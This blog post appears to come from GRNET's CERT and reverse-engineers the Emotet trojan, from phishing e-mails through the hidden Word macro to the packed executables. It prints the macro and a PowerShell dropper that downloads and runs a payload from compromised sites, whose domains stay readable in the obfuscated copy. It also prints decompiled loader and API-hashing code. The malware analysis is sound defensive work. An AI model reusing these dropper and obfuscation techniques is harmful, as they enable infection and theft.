# Reverse engineering Emotet – Our approach to protect GRNET against the trojan

**cert.grnet.gr/en/blog/reverse-engineering-emotet/**

By Dimitris Kolotouros and Marios Levogiannis

## Preamble

In October 2020 we observed an outbreak of malicious e-mails reaching GRNET employees’ inboxes. Meanwhile, similar campaigns were also targeting several public and private sector organizations in Greece. After acquiring dozens of such e-mails, we started planning our defensive strategy. To do so, we started analyzing the malware that was attached to the e-mails and realized that we were dealing with the infamous Emotet trojan.

In this document, we describe the steps of our analysis including the reverse engineering process of the malware executables, how we overcame the binary obfuscation techniques it employed, and how we determined the malware’s internals.

In the course of our work, we were able to discover the list of IP addresses that constituted the network of Command-and-Control (C2) servers of Emotet. This information was very useful because we utilized it to detect any network connections from the GRNET network to the Emotet C2 network. Such connections would indicate a potentially compromised workstation in our premises.

Overall, the goals of our analysis were to (a) create an infrastructure that would receive new updates of the Emotet trojan and keep our list of C2 IP addresses up to date and (b) understand the trojan’s persistence mechanism to perform forensic investigations on compromised workstations.

On January 27, 2021 [Europol announced](https://www.europol.europa.eu/newsroom/news/world%E2%80%99s-most-dangerous-malware-emotet-disrupted-through-global-action) that it had completely taken down Emotet. The same day our update-monitoring infrastructure received an update which was Europol’s clean-up payload scheduled to be executed on April 25, 2021 at 12:00 p.m. Hopefully, this will be the last time that we hear about Emotet.
Meanwhile, we had been working on analyzing Emotet up to the time of Europol’s announcement. We release our analysis results hoping that IT professionals will find them useful when trying to protect against similar trojans in the future.

In [Chapter 1](https://cert.grnet.gr/en/blog/reverse-engineering-emotet/#Chapter_1_From_the_e-mails_to_the_binaries) we describe the malicious e-mails and the malware dropper (a macro-enabled MS Word document) delivered via those e-mails. If you are already familiar with Emotet’s dropper you may directly skip to the next chapters. In [Chapter 2](https://cert.grnet.gr/en/blog/reverse-engineering-emotet/#Chapter_2_From_the_Protector_to_the_Trojan) we analyze the malware’s multi-layer Protector responsible for unpacking, decrypting and running the trojan for the first time. In [Chapter 3](https://cert.grnet.gr/en/blog/reverse-engineering-emotet/#Chapter_3_Overcoming_the_malware_obfuscation_techniques) we describe the binary obfuscation techniques incorporated in the trojan itself as well as the ways to bypass them. In [Chapter 4](https://cert.grnet.gr/en/blog/reverse-engineering-emotet/#Chapter_4_The_trojans_internals) we provide an in-depth description of the trojan’s inner workings, its persistence mechanism, the communication with the Command-and-Control servers network and the way we discovered the C2 network. Finally, in [Chapter 5](https://cert.grnet.gr/en/blog/reverse-engineering-emotet/#Chapter_5_Monitoring_the_updates) we briefly describe the process we followed to retrieve and analyze new payloads served by the C2 network.

We have published the de-compiled code of referenced functions as well as the utilities that we implemented during the analysis in a [GitHub repository](https://github.com/grnet/emotet-utils).

This work was carried out under the supervision of GRNET’s Chief Information Security Officer, Dimitris Mitropoulos.

Dimitris Kolotouros – Head of IT Security Department, GRNET
Marios Levogiannis – Senior IT Security Engineer, GRNET

Figure 0. Emotet stages overview

## Chapter 1. From the e-mails to the binaries

### Introduction

October 2020. Seven months have passed since the first COVID-19 lockdown in Greece. The pandemic finds GRNET with a largely broadened IT Security agenda heavily linked with the state’s current digital transformation (involving several new applications being developed and maintained in house). The aforementioned developments, together with the work-from-home style that has just arrived, completely redefined the security perimeter and priorities of GRNET CERT. A new era comes with new challenges.

Somewhere in between the various ongoing tasks, a number of weird-looking e-mails that reached GRNET employees came to our notice. They all had a similar form, i.e., replies to legitimate e-mails that contained either a URL or an encrypted ZIP attachment and its password.

### The e-mails

First, to raise awareness, we notified all GRNET employees. Then, we started collecting and analyzing the suspicious e-mails. Initially, we inspected their source code looking for similarities.

Figure 1. E-mails delivering Emotet dropper via URL (left) and attachment (right)

Our analysis led to several interesting remarks:

- All e-mails were replies to legitimate e-mails. The e-mail subject followed a specific pattern, i.e., “Re: ”. Also, the e-mail body contained the quoted original e-mail body.
- The sender’s display name was altered to be the same as that of the original e-mail. However, the sender’s e-mail address was some unrelated e-mail address (several compromised e-mail accounts were used).
- The body of the reply contained either a URL or an attachment. In the case of the URL, the text contained a legitimate domain name (e.g. gmail.com). Nevertheless, the actual target was completely different.
Our investigation indicated that the actual targets were compromised websites used by the attackers to host the malicious documents. In the case of the attachment we observed encrypted ZIP files with the corresponding password contained in the reply body. Note that password-encrypted attachments are commonly used to bypass any malware detection running on e-mail servers.

Finally, in all cases we ended up with MS Word documents.

### The MS Word documents

Up to this point, we had already been informed about similar cases affecting other public and private sector organizations in Greece. Thus, a conventional incident response was not enough; we wanted to further analyze the malware. Our analysis started with the Word documents.

When opening one of the documents, the victim sees a fake pop-up window. In fact, this is just an image inside the document imitating a legitimate pop-up window. In each document the fake pop-up window phrasing was different, but in every case it was there to persuade the victim to enable the Macro execution.

Figure 2. Fake MS Word pop-ups in Emotet dropper

We will continue by analyzing one of the MS Word documents. All other documents were similar to the one examined, albeit with minor differences.

### The VBScript Macros

To see what would happen when a user enabled the macros, we examined the corresponding VBScript. The entry-point `Document.Open()` called function `Q4hxwcihtett()` of module `Iauesnh6lzhaf`:

Figure 3. The VBScript macro entry point

The function code, as we observe below, was obfuscated:

Figure 4. The main VBScript macro module

We started following the code flow manually to understand it. This manual process revealed that most of the code was indeed irrelevant. Specifically, for each meaningful code instruction, the obfuscation process had generated a bunch of meaningless instructions placed before the meaningful one.
So, most of the de-obfuscation effort was to identify each block and isolate the meaningful code instruction out of the block.

Luckily enough, the attackers had left some traces that were helpful for us. As we noticed, their obfuscating tool had a serious issue (nobody’s perfect). In particular, it did not apply the indentation of the original instruction on the instructions of the replacement block. As a result, the original indentation could be found on the first instruction of each block. This issue gave us a way to automatically detect the blocks and isolate the last instruction of each block, which we knew was the meaningful instruction of the block.

The following obfuscation techniques were identified:

- Deliberate run-time errors in junk instructions (which were ignored because of the `On Error Resume Next` statement),
- String construction using one or more of the following:
  - String concatenation,
  - Use of undefined variables that resolve to empty strings,
  - String replacements with the `Replace()` function,
  - Conversion of ASCII codes to strings with the `ChrW()` function,
  - Retrieval of values from hidden user form control elements,
- Alternation between upper and lower case letters in symbol names, exploiting the case insensitivity of the language,
- Use of the line-continuation character `_` to break statements in multiple lines.

Then, we only had to manually de-obfuscate some lines of code (the original number of lines was a little more than 400).
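
The indentation trick described above can be sketched in a few lines of Python. This is only an illustration, not the tool we used: it assumes that every original instruction was indented, that the junk and meaningful instructions following the first line of a block carry no indentation, and that line continuations (`_`) have already been joined. The function name and the sample macro lines are hypothetical.

```python
def isolate_meaningful_lines(obfuscated_source: str) -> list[str]:
    """Return the last instruction of every block, re-indented.

    Assumption (not confirmed by the original tool): a block starts at
    an indented line and extends over the following unindented lines.
    """
    blocks: list[list[str]] = []
    for line in obfuscated_source.splitlines():
        if not line.strip():
            continue  # ignore blank lines
        starts_block = line[0] in " \t"
        if starts_block or not blocks:
            blocks.append([line])
        else:
            blocks[-1].append(line)

    result = []
    for block in blocks:
        first = block[0]
        # The first line of the block still carries the original indentation.
        indent = first[: len(first) - len(first.lstrip())]
        # The last line of the block is the meaningful instruction.
        result.append(indent + block[-1].strip())
    return result


# Hypothetical obfuscated fragment: two blocks, each ending in real code.
SAMPLE_MACRO = "\n".join([
    "    junkA = 1 / 0",
    "junkB = junkA & junkC",
    'Set target = CreateObject("winmgmts:Win32_Process")',
    "    junkD = Len(junkE)",
    "target.Create commandLine",
])
```

Calling `isolate_meaningful_lines(SAMPLE_MACRO)` keeps only the two instructions that end each block, which then still need the manual string de-obfuscation mentioned above.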
The result of the de-obfuscation was the following:

```
01: Rem Attribute VBA_ModuleType=VBADocumentModule
02: Option VBASupport 1
03: Private Sub Document_open()
04:     Set storyRange = ThisDocument.StoryRanges.Item(1)
05:     Set commandLine = Mid(storyRange, 5, Len(storyRange))
06:     commandLine = Replace(commandLine, "][ 1) jjkgS [] []w", Empty)
07:     Set objProcess = CreateObject("winmgmts:Win32_Process")
08:     Set objProcessStartup = CreateObject("winmgmts:Win32_ProcessStartup")
09:     objProcessStartup.ShowWindow = 0
10:     objProcess.Create commandLine, Empty, objProcessStartup
11: End Sub
```

Hence, we were able to answer an important question: “What happens when the user executes this macro?” Well, it spawns a process by calling the `Win32_Process.Create()` method (line 10). The startup information parameter says “do not show a window” (line 9). Further, the command line parameter holds the command that will be invoked by the spawned process. As we can observe in the code, the command is already in the document (lines 4-5) together with some junk that is removed (line 6). So there was something more in the document itself apart from the fake pop-up window.

### The PowerShell script

First, we removed the formatting. In this way we revealed a paragraph that was kept out of the victim’s sight (it was formatted with a font size of 2px and a white font color):

Figure 5. Obfuscated PowerShell command hidden in document body

This looked obfuscated, too. But we already knew how to de-obfuscate it, i.e. `Replace(commandLine, "][ 1) jjkgS [] []w", Empty)`:

Figure 6. De-obfuscated PowerShell command

The result would attempt to run a PowerShell script that is encoded in base64 format. We decoded it to discover the actual PowerShell script:

Figure 7. Base64-decoded PowerShell script

After performing a proper indentation, i.e.
split lines on each ‘ ; ‘ and perform indentations on code blocks ‘ { ‘ and ‘ } ‘, we got the following: ----- ``` $1D2 [tYpE]( {3}{1}{4}{5}{0}{2} f ecTo, SteM., Ry, sy, Io., diR ); $tJ8m4B =[TYpe]("{2}{4}{5}{1}{3}{0}"-f 'r','iNTmAnAg','sYsteM.nE','e','T','.SerVIcEpO') ; $Ysa212g=('N'+('b7ib0'+'0')); $S95cz34=$I0phsdk + [char](64) + $Ixdbxto; $Qdfg2cp=(('Chns'+'7')+'2'+'d'); (dIR variABle:1D2).valuE::"CR`eAteDir`ectory"($HOME + ((('8U'+'L')+('Pj'+'q')+ ('6t3'+'_8UL'+'Jvn'+'k')+('7'+'yk')+('8U'+'L'))."R`e`place"(('8'+'UL'),'\'))); $Qo08jci=('F'+'5'+('ocx'+'ex')); ( ITEM vARIAblE:Tj8M4B ).VAlUe::"SeC`U`RI`TyPRoTOc`OL" = (('Tl'+'s1')+'2'); $R7w053i=(('Nue'+'l2')+'4'+'k'); $Tedbr00 = ('N'+'1p'+('jur'+'3u')); $H_8yni0=('J6'+'a'+('f'+'fv6')); $Roz09dp=('V'+('t9'+'1oph')); $Glkvf7b=$HOME+(('{0'+'}Pjq6'+'t'+'3_'+'{0'+'}Jvnk7yk{0}') -F[Char]92)+$Tedbr00+ ('.e'+'xe'); $Ads4mxg=(('E'+'2n')+'0j'+'qo'); $Q4b1g5n=.('new-o'+'b'+'jec'+'t') nEt.WEBcLieNt; $Boiep01=((('ht'+'tp:]['+' ')+'1'+((') '))+'jj'+(('kgS [] []w'+']['+' 1)'+' '))+ ('jj'+'kgS []')+(' []wi'+'nnh')+('anma'+'chn.')+(('com]'+'[ 1) '))+'j'+('jkgS'+' []')+(' []'+'w')+'wp'+('-'+'adm')+(('in][ '+'1)'+' j'))+('j'+'kg')+('S []'+' []')+'w'+('sA'+']')+'['+((' 1'+') jjkg'+'S'))+' '+'['+('] '+'[')+']w'+'@h'+ (('ttp:'+']'+'[ '+'1) jj'))+('k'+'gS ')+('[]'+' ')+'['+']'+(('w]['+' 1)'))+(' j'+'j')+('kgS []'+' []'+'wsh')+'om'+'al'+('house'+'.co')+('m]'+'[')+' 1'+((')'+' jjkg'))+('S '+'[]')+(' []wwp-'+'in'+'c'+'lu')+'de'+('s'+'][')+' 1'+((') '))+ ('j'+'jk')+'g'+'S '+('[]'+' [')+(']w'+'I')+('D3'+'][')+' 1'+')'+(' jjk'+'g')+('S '+'[]')+' '+(('['+']wI'+'Dz][ 1)'))+(' jjkg'+'S')+' '+('[] '+'['+']w@h')+ ('ttp'+':]'+'[ ')+(('1)'))+(' '+'jjkgS '+'[] ')+('[]'+'w][')+((' '+'1)'))+(' '+'jjk')+('g'+'S []')+(' ['+']')+'wb'+'lo'+('g'+'.ma')+('r'+'tyr')+('ol'+'ni')+ ('ck.'+'com')+']'+('['+' 1')+((')'+' j'))+'jk'+('gS'+' [] '+'[')+(']wwp'+'-'+'adm')+ ('in'+']')+(('[ 1) '+'jj'))+'k'+('gS ['+'] ')+('['+']wS')+('pq]'+'[ 1')+((') '))+'j'+'jk'+('gS [] 
[]'+'w'+'@htt')+'p'+'s:'+']'+(('[ '+'1) j'+'jkgS '))+'[]'+' '+ ('['+']w]')+'['+' 1'+((') '))+'jj'+('kgS [] ['+']wwww'+'.f')+'r'+ ('ajamom'+'ad'+'ri'+'d.c'+'om')+(']'+'[ 1')+((') j'+'j'))+'kg'+'S '+('[] ['+']w')+ ('wp'+'-')+('cont'+'e')+('nt'+']')+'[ '+'1'+((')'+' j'))+('jk'+'g')+'S'+(' ['+']')+(' '+'[]wg]')+(('[ 1)'+' j'+'jkg'))+'S '+('[]'+' ')+('['+']w@h')+'tt'+(('p'+'s:'+'][ 1'+') '+'jjk'+'gS [] '))+('[]w]['+' ')+(('1)'+' '))+('jjkg'+'S ['+']')+' ['+']w'+ ('p'+'esqui')+('s'+'ac')+'re'+'d'+(('.'+'com][ 1) jj'+'k'))+'g'+'S '+'[]'+(' []w'+'vmw')+('ar'+'e-unl')+('ock'+'e')+('r'+'][ 1')+((') '))+('j'+'jk')+'g'+('S ['+'] ')+('['+']w')+'da'+'C'+']'+'['+((' '+'1) '+'jj'))+('kg'+'S')+' '+('[]'+' ')+'[]'+'w'+'@'+('ht'+'tp')+'s:'+']['+((' 1)'+' '))+'j'+'j'+('k'+'gS')+(' ['+']')+(' ['+']')+('w][ '+'1')+')'+' '+('jj'+'kgS ')+'['+(']'+' []wme')+'d'+('h'+'em')+ (('pfa'+'rm.c'+'om]'+'[ 1)'))+' '+('jj'+'kg')+('S'+' [] [')+(']wwp'+'-a')+'dm'+ ('in'+']')+'['+' '+'1'+((') jjkgS ['+']'+' []w'+'L'))+'b'+(('][ 1'+') jj'))+ ('k'+'gS'+' []')+' '+'[]'+'w'+'@h'+('t'+'tp:][ 1')+')'+(' j'+'jkgS []'+' ')+'['+ (']w]'+'[')+((' 1'+')'))+(' '+'jj')+('kg'+'S []'+' []')+'w'+('ien'+'g')+ ('li'+'sha')+'bc'+('.c'+'o')+(('m]['+' 1)'+' j'))+('jk'+'gS')+((' '+'[]'+' ['+']wc'+'ow][ 1'+') '))+'jj'+'k'+('gS'+' ')+'['+']'+(' '+'[]')+('w2B'+'B')+(('][ '+'1)'))+' '+'j'+('jk'+'g')+('S '+'[] ')+'[]'+'w'))."R`ep`lacE"(((']['+((' '+'1) jjkg'+'S []'))+' '+('[]'+'w'))),([array]('/'),('x'+'we'))[0])."S`PliT"($Od7ccw9 + $S95cz34 + $On55ljg); $Q9eccc5=(('F'+'o4')+'g'+('2'+'rk')); foreach ($S7m_bsh in $Boiep01){ try{ $Q4b1g5n."d`oWnL`Oa`DfIlE"($S7m_bsh, $Glkvf7b); ``` ----- ``` $E4fktea ( D + li +( 0 + 4n_ )); If ((&('Get'+'-Ite'+'m') $Glkvf7b)."l`e`Ngth" -ge 47912) { ([wmiclass]('wi'+('n'+'32')+'_P'+('r'+'ocess')))."CR`e`AtE"($Glkvf7b); $Klmmlcr=(('V6z'+'43'+'q')+'d'); break; $Myse8pt=('S8'+('266j'+'7')) } } catch{ } } $Xwnf9b5=('R_'+('1kl'+'w')+'o') ``` We then noticed some common obfuscation techniques: String 
formatting to scramble string elements (e.g. `"{3}{1}{4}{5}{0}{2}"-f 'ecTo','SteM.','Ry','sy','Io.','diR'`); insertion of the backtick escape character ( `` ` `` ) in symbol names (e.g. ``d`oWnL`Oa`DfIlE``); alternation between upper and lower case letters in symbol names, exploiting PowerShell’s case insensitivity (e.g. `nEt.WEBcLieNt`); string construction with concatenation and junk removal with the `Replace()` method; use of undefined variables in string concatenations that actually act as empty strings; and insertion of irrelevant code instructions.

We then used a PowerShell interpreter to evaluate strings and, after removing irrelevant instructions and renaming the variables, we had the de-obfuscated code:

```
[System.IO.Directory]::CreateDirectory($HOME + "\\Pjq6t3_\\Jvnk7yk\\");
[System.Net.ServicePointManager]::SecurityProtocol = "Tls12";
$filepath = $HOME + "\\Pjq6t3_\\Jvnk7yk\\N1pjur3u.exe";
$webclient = New-Object System.Net.WebClient;
$urls = "http://in*******hn.com/wp-admin/sA/",
        "http://sh*******se.com/wp-includes/ID3/IDz/",
        "http://blog.ma********ck.com/wp-admin/Spq/",
        "https://www.fr*********id.com/wp-content/g/",
        "https://pe********ed.com/vmware-unlocker/daC/",
        "https://me*******rm.com/wp-admin/Lb/",
        "http://ie*******bc.com/cow/2BB/";
foreach ($url in $urls) {
    try {
        $webclient.DownloadFile($url, $filepath);
        If ((Get-Item $filepath).Length -ge 47912) {
            ([wmiclass]("Win32_Process")).Create($filepath);
            break;
        }
    } catch {}
}
```

The outcome was a pretty simple script. It attempts to download an executable file from several URLs and store it in the path `$HOME\Pjq6t3_\Jvnk7yk\N1pjur3u.exe` (the URLs and the path were different in each Word document). The size of each downloaded file is checked against a minimum value (47912 bytes) to ensure that if the executable has been removed from the compromised website, the 404 HTML page will be ignored and the next URL will be tried.
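
The two string transformations used by the dropper can be reproduced outside PowerShell. The sketch below is a minimal Python illustration, not the procedure we followed (we evaluated the strings in a PowerShell interpreter). The junk marker and the `@` separator are taken from the script above. The base64 helper assumes the command was passed through PowerShell’s `-EncodedCommand` option, which expects base64 over UTF-16LE text. The function names and the `*.example` host names are hypothetical.

```python
import base64

# Junk marker seen in both the VBA macro and the PowerShell script.
JUNK = "][ 1) jjkgS [] []w"


def decode_encoded_command(b64_text: str) -> str:
    """Decode a base64 PowerShell command.

    Assumption: the payload was supplied via -EncodedCommand, so the
    decoded bytes are UTF-16LE text.
    """
    return base64.b64decode(b64_text).decode("utf-16-le")


def recover_urls(obfuscated: str, junk: str = JUNK, separator: str = "@") -> list[str]:
    """Mirror the script's Replace(junk, '/') followed by Split('@')."""
    return obfuscated.replace(junk, "/").split(separator)


# Hypothetical obfuscated URL list built the same way as in the dropper.
SAMPLE_URLS = (
    "http:" + JUNK + JUNK + "a.example" + JUNK + "wp-admin" + JUNK + "sA" + JUNK
    + "@"
    + "https:" + JUNK + JUNK + "b.example" + JUNK + "x" + JUNK
)
```

For instance, `recover_urls(SAMPLE_URLS)` yields the two URLs `http://a.example/wp-admin/sA/` and `https://b.example/x/`, in the same order in which the dropper would try them.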

When a file has been downloaded, it gets executed in a new process by calling the `Win32_Process.Create()` method.

After following the same de-obfuscation procedure on every Word document available, we fetched the actual malware executables from the URLs described in the PowerShell scripts. To do so, we imitated the PowerShell User-Agent in a way; we needed to look like a malicious PowerShell script after all!

PS. During the course of our analysis we came across several compromised e-mail accounts and websites. In all cases, we sent abuse reports to the corresponding abuse contacts informing them of their compromised assets.

## Chapter 2. From the protector to the trojan

### Introduction

In the previous chapter we documented the detection and preliminary analysis of a malware that was distributed via e-mails. We saw that the e-mails included an MS Word document with macros that spawn a new process running a PowerShell script on the victim’s machine. We also observed that the PowerShell script spawns one more process running an executable file downloaded from the Internet. Finally, we downloaded several of those executable files.

With the executable files at hand, we wanted to examine their internals without running them. Thus, we continued with our reverse engineering process. At this point we started working with Ghidra, a free, open-source, reverse engineering tool that was released last year.

### The executable files

First, we loaded some of the executable files and observed that they were PE (Portable Executable) files compiled for the x86 LE architecture.

Figure 8. Emotet Protector’s architecture details

We started looking for meaningful data such as imported symbols and defined strings. To our surprise we observed a number of different programs. Also, we noticed that in every executable file there was one defined string looking like a random key.

Figure 9.
Random keys in various Emotet Protectors’ strings

Apart from that, all the other strings seemed to differ between the executable files. Assuming that this is not a coincidence, we looked for references to these strings in the de-compiled code. While looking, we noticed one more similarity: although the surrounding code also seemed to differ between the executable files, there was an identical code pattern that consumed the alleged key.

Figure 10. Code referencing the keys in various Protectors

We reverse engineered this part of the code, and ended up with the following code:

```
WPARAM FUN_00407b2e(HINSTANCE param_1,int param_2)
{
  byte *resourceBuffer;
  _LDR_RESOURCE_INFO resourceInfo;
  _IMAGE_RESOURCE_DATA_ENTRY *ResourceDataEntry;
  void *resource;
  word iv;
  dword resourceSize;
  ...
  resource = (void *)0x0;
  resourceSize = 0;
  resourceInfo.Type = 10;
  resourceInfo.Name = 0x1e55;
  resourceInfo.Language = 0x409;
  ...
  _LdrFindResource_U_PTR = GetProcAddress(s_ntdll_Module2,s_LdrFindResource_U_0040d8cc);
  ...
  _LdrAccessResource_PTR = GetProcAddress(s_ntdll_Module2,s_LdrAccessResource_0040d8b4);
  iVar3 = (*_LdrFindResource_U_PTR)(0x400000,&resourceInfo,3,&ResourceDataEntry);
  if (-1 < iVar3) {
    (*_LdrAccessResource_PTR)(0x400000,ResourceDataEntry,&resource,&resourceSize);
  }
  resourceBuffer = (byte *)VirtualAlloc((LPVOID)0x0,resourceSize,0x1000,0x40);
  memcpy(resourceBuffer,resource,resourceSize);
  DeriveKey(s_*FLrY4bO%4Th$J8Gt0z*zKiB)Yb#mGNy_0040d5b4,0x57,(uint)&iv);
  DecryptResource(resourceBuffer,resourceSize,&iv);
  (*(code *)resourceBuffer)();
  ...
}
```

The code above has the following functionality:

- allocates an executable memory region with `VirtualAlloc()`, where `0x1000` corresponds to `MEM_COMMIT` and `0x40` corresponds to the `PAGE_EXECUTE_READWRITE` protection level,
- loads a specific resource from the executable’s resources into this region,
- derives a decryption key from the previously mentioned main key,
- decrypts the contents of the resource using the derived key, and
- finally, uses the reference to the decrypted data as a function pointer and calls the function.

In [deriveKey.c](https://github.com/grnet/emotet-utils/blob/master/decompiled/deriveKey.c) and [decryptResource.c](https://github.com/grnet/emotet-utils/blob/master/decompiled/decryptResource.c) we include the reverse engineered code of the functions.

The attackers hid the actual payload in the resource described by the following `RESOURCE_INFO` variable (type 10 is `RT_RCDATA`, i.e. raw application-defined data, and language `0x409` is English (United States)):

```
resourceInfo.Type = 10;
resourceInfo.Name = 0x1e55;
resourceInfo.Language = 0x409;
```

We found the payload in the resources section of the executable file, just below this mouse icon:

Figure 11. The encrypted payload in Emotet Protector’s resources

At that point we had the encrypted payload, the main key, the key derivation function and the decryption function. The only thing left was to decrypt the payload. So we reused the reverse engineered `DeriveKey()` and `DecryptResource()` functions to write a small decryption tool. After that we were able to decrypt the resource.

### The decrypted resource

Loading the decrypted resource in Ghidra was not just a drag-n-drop task. Apparently, there were no executable headers to let Ghidra infer the architecture details. However, we knew that this payload was loaded in the memory space of the initial executable so we only had to define the architecture to be the same as the initial executable. Furthermore, we knew that the executable starts with a function (the pointer to the memory was handled as a function pointer as previously described).
With a little manual work, we managed to analyze the payload with Ghidra:

Figure 12. The decrypted resource’s entry-point

As shown above, the code pushes some values onto the stack and then calls function `FUN_0000002d()`. The values pushed onto the stack must be the function arguments. Among these values we noticed `0x529` and `0x31529` which Ghidra analyzed as memory references (`DAT_0000052e` and `DAT_0003152e`).

`DAT_0003152e` contains the last 5 bytes of the executable representing the null-terminated string “dave” that looked like a magic value.

Figure 13. The referenced DAT_0003152e in decrypted resource

`DAT_0000052e` was more interesting. The first two bytes were the printable characters “MZ”. As you probably know this is the header signature of DOS MZ executables. This was a very good lead.

> The file can be identified by the ASCII string “MZ” (hexadecimal: 4D 5A) at the beginning of the file (the “magic number”). “MZ” are the initials of Mark Zbikowski, one of the leading developers of MS-DOS.
> _[Wikipedia](https://en.wikipedia.org/wiki/DOS_MZ_executable)_

Figure 14. The MZ magic value in the decrypted resource

By further examining the contents of `DAT_0000052e`, we identified some known MS-DOS stub strings, such as “This program cannot be run in DOS mode”. Of course this resembles a PE executable.

Figure 15. The MS-DOS stub in the decrypted resource

We went on reversing the `FUN_0000002d()` function assuming that its first argument is a reference to a PE executable.

The first difficulty was the mysterious function named `FUN_00000456()`. This function is invoked several times at the beginning of `FUN_0000002d()` with a different argument each time. The return values are stored in local variables and later on they are used as function pointers. Apparently, the function somehow resolved these arguments to function addresses. Thus we needed to reverse engineer `FUN_00000456()`.

Figure 16.
Symbol resolving in the decrypted resource’s code

Examining `FUN_00000456()`, we came across a technique for resolving library symbols. Specifically, the function retrieves the list of loaded libraries (`InLoadOrderModuleList`) from the Process Environment Block (PEB) and loops over each exported symbol of each library. On each loop a combined hash (32-bit value) of the library name and symbol name is calculated. If this value matches the function argument, a pointer to the address of the corresponding function is returned (in [resolveImportByHash.c](https://github.com/grnet/emotet-utils/blob/master/decompiled/resolveImportByHash.c) we include the reverse engineered code of the function). As soon as we understood the internals of the hashing mechanism, we wrote a short script, [generate_symbol_hashes1.py](https://github.com/grnet/emotet-utils/blob/master/utilities/generate_symbol_hashes1.py), that calculates these hash values for every symbol of several common libraries (`ntdll.dll`, `kernel32.dll`, etc.) and exports them to a proper (and long) C enumeration:

Figure 17. Calculated symbol hashes enumeration

After importing the generated enum in our Ghidra project (and properly retyping the function), we had a clear view of which library functions are called later on:

Figure 18. Reverse engineered symbol resolving

We were now able to continue reversing the `FUN_0000002d()` function. After a good amount of analysis we concluded that the function is a pretty basic binary image loader with the following function signature (in [loadBinary.c](https://github.com/grnet/emotet-utils/blob/master/decompiled/loadBinary.c) we include the complete reverse engineered code):

```
byte * loadBinary(byte *pe_ptr,byte *functionToRunHash,byte *functionToRunParam1,
                  int functionToRunParam2,int copyDosHeader)
```

Internally, the function:

- allocates the memory buffer (in which the image will be loaded) with `VirtualAlloc()`,
- copies the headers from the source image,
- copies the sections from the source image,
- loads and links the imported symbols (libraries),
- applies the relocations,
- applies proper memory protection to each section with `VirtualProtect()` (that way the executable sections of the loaded binary will be in executable memory sections),
- runs the executable’s entry-point,
- runs an exported symbol, the name of which matches the `functionToRunHash` hash value, passing the parameters `functionToRunParam1` and `functionToRunParam2`,
- returns a pointer to the allocated buffer.

The code at the beginning of the encrypted payload could now be translated into something meaningful:

Figure 19. Reverse engineered entry-point

In this way, we knew that the executable included at address `0x0000052e` will be loaded. Then, the entry-point is invoked:

Figure 20. Reverse engineered code running the nested binary

When the entry-point returns, its exported symbol, i.e., an exported function with a name matching the `0xed1c7b90` hash value, will run.

We exported the executable included at address `0x0000052e` in a separate file and loaded it into Ghidra.

### The nested executable

We loaded the nested executable in Ghidra and went straight to the entry-point. The entry-point just calls a function with a couple of parameters.

Figure 21. The nested executable’s entry-point

You might wonder what this `DAT_10004070` value is. So did we. As a result, we had a quick look into its contents:

Figure 22. MZ magic value in the nested executable

That “MZ” signature on the right looks familiar, doesn’t it? Well, this is another nested PE executable! It was like opening a matryoshka doll.

We reverse engineered the `FUN_10001000()` function and, as you can probably guess, it was yet another binary image loader with the following function signature:

```
struct_paramContainer * __cdecl loadBinary(byte *pe_ptr,uint pe_size)
```

Internally, it performs the following tasks:

- allocates the memory buffer (in which the image will be loaded) with `VirtualAlloc()`,
- copies the headers from the source image,
- fixes the relocation table entries according to the offset between the allocated buffer address and the `ImageBase`,
- loads and links the imported symbols (libraries),
- copies the sections from the source image and applies proper memory protection to each section with `VirtualProtect()` (that way the executable sections of the loaded binary will be in executable memory),
- initializes the Thread Local Storage (TLS) according to the image TLS Section,
- modifies the base addresses (`ImageBaseAddress` and `LoaderData->InLoadOrderModuleList->DllBase`) of the Process Environment Block (PEB) so that they point to the allocated buffer,
- runs the executable’s entry-point.

Figure 23. Reverse engineered code running the actual trojan

Once again we exported the executable included at address `0x10004070` in a separate file that we had to explore.

## Chapter 3. Overcoming the malware obfuscation techniques

### Introduction

In the previous chapter, we explored the steps until the actual trojan is executed. We observed that the downloaded executable decrypts part of itself and executes the second stage payload. This payload, in turn, executes another payload, i.e. the executable that we will analyze in this chapter and Chapter 4.
In this chapter, we’ll fast-forward and describe the obfuscation techniques employed by the latter executable. This will provide us with the necessary background to further explain its functionality in Chapter 4.

### Symbol Resolution Obfuscation

The first thing that we noticed after loading the executable in Ghidra was that it does not import any symbols. In particular, it is not feasible for an executable of only 369 KB to have a Windows API implementation statically linked. Hence, it became obvious that it was probably using a custom mechanism to resolve symbols from system libraries.

Figure 24. Emotet trojan’s Symbol Tree

Starting from the entry-point, we noticed the following lazy initialization pattern, the result of which is stored in a global variable and is used as a function pointer. The same pattern (and some variations of it) is used all over the executable.

Figure 25. Symbol resolving in Emotet trojan’s entry-point

Could this be the custom symbol resolution mechanism employed by the trojan to hide the APIs that it uses? To find out, we reverse engineered functions `FUN_00404190()` and `FUN_004040f0()`. Indeed, these two functions work almost like `FUN_00000456()` described in Chapter 2:

- `FUN_00404190()` starts from the Thread Information Block (the address of which is available from the `FS` segment register on 32-bit Windows), accesses the Process Environment Block (PEB) and iterates over the list of loaded modules (`InLoadOrderModuleList`). For each module, it calculates the hash of its lowercased name and compares it against the specified parameter. If they match, the function returns the module’s base address. Essentially, it works like `GetModuleHandle()`, but instead of specifying the module’s name, the caller specifies the module name’s hash.
- `FUN_004040f0()` parses the module specified in the first parameter to find its export table and iterates over the exported symbols.
For each exported symbol, it calculates the hash of its name and compares it against the value specified in the second parameter. If they match, it either returns the address that the symbol points to (if the symbol is an export) or recursively resolves the symbol forwarded from another module (if the symbol is a forwarder).

This technique is called API Hashing. In [findModuleByHash.c](https://github.com/grnet/emotet-utils/blob/master/decompiled/findModuleByHash.c) and [findModuleExportByHash.c](https://github.com/grnet/emotet-utils/blob/master/decompiled/findModuleExportByHash.c) we include the reverse engineered code of the functions. Again, we wrote a short script, [generate_symbol_hashes2.py](https://github.com/grnet/emotet-utils/blob/master/utilities/generate_symbol_hashes2.py), that calculates the hashes for every symbol of some common libraries (e.g. `ntdll.dll`, `kernel32.dll`, etc.) and exports them to two C enumerations:

Figure 26. Calculated library and symbol names hashes enumerations

After importing the enumerations in Ghidra, we had a clear view of the modules and functions imported by these calls.

Figure 27. Emotet trojan’s reverse engineered symbol resolving

### String Obfuscation

We noticed that the binary contained hardly any strings. This made us suspicious because an executable that performs any meaningful functionality can hardly avoid containing strings. As a result, we assumed that some kind of string obfuscation is used. The following is the full list of the strings that we identified.

Figure 28. List of defined strings in Emotet trojan

